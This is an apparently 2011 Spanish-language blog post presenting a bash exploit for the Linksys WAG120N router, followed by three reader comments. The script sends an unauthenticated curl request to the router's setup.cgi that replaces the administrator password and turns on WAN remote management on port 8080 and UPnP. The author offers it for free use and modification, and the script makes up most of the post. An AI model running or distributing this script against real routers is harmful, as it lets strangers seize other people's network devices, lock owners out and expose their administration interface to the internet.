Sin necesidad de ningún tipo de credenciales ni logueo previo, es posible cambiar la clave del administrador (entre otras cosas =) del router Linksys Wag120n, al ver el exploit de los chicos de ircrash me dieron ganas de hacer mi propia versión en bash (hace muuucho q no hago nada con este lenguaje scripting).
Como siempre digo, sean libres de modificarlo a gusto y a portarse bien, sean chicos buenos ~(8(|)
#!/bin/bash
#
# Este script cambiara la clave de administrador
# del router Linksys Wag120n por el password pasado
# por parametro.
#
# Ej: $./linksyspwn 192.168.1.1 qwerty
#
# www.e-videncia.com.ar
# by Mario Corvalan - Marzo 2011
#
param=(
"-F \"user_list=1\"
-F \"h_user_list=1\"
-F \"sysname=admin\"
-F \"remote_management=enable\"
-F \"http_wanport=8080\"
-F \"upnp_enable=enable\"
-F \"wlan_enable=enable\"
-F \"igmp_proxy_enable=enable\"
-F \"save=Save+Settings\"
-F \"h_pwset=yes\"
-F \"sysname_changed=yes\"
-F \"pwchanged=yes\"
-F \"pass_is_default=false\"
-F \"h_remote_management=enable\"
-F \"pass_is_none=no\"
-F \"h_upnp_enable=enable\"
-F \"h_wlan_enable=enable\"
-F \"h_igmp_proxy_enable=enable\"
-F \"todo=save\"
-F \"this_file=Administration.htm\"
-F \"next_file=Administration.htm\"
-F \"message=\"
-F \"h_wps_cur_status=\""
)
if [ $# != 2 ]
then
echo "Ejecutar: ./dlinkpwn.sh <ip> <new_pass>"
exit 1
fi
curl -F "sysPasswd=$2" -F "sysConfirmPasswd=$2" `echo ${param[0]}` http://$1/setup.cgi
Para mas información ...
http://ircrash.com/
http://www.exploit-db.com/exploits/16252/
3 comentarios:
la verdad no entender nada, pero esta bueno que haga cosas buenas che...saludos
pongo anonimo, no vaya a ser que me hackees la cuenta...jejeje
interesante.. esto se puede aplicar a otros similares de Cisco? lo probaste?
no tuve la oportunidad de probarlo con otro tipo d router cisco :(
Si sabes algo en cuanto a otros modelos, avisa y actualizamos el post
Publicar un comentario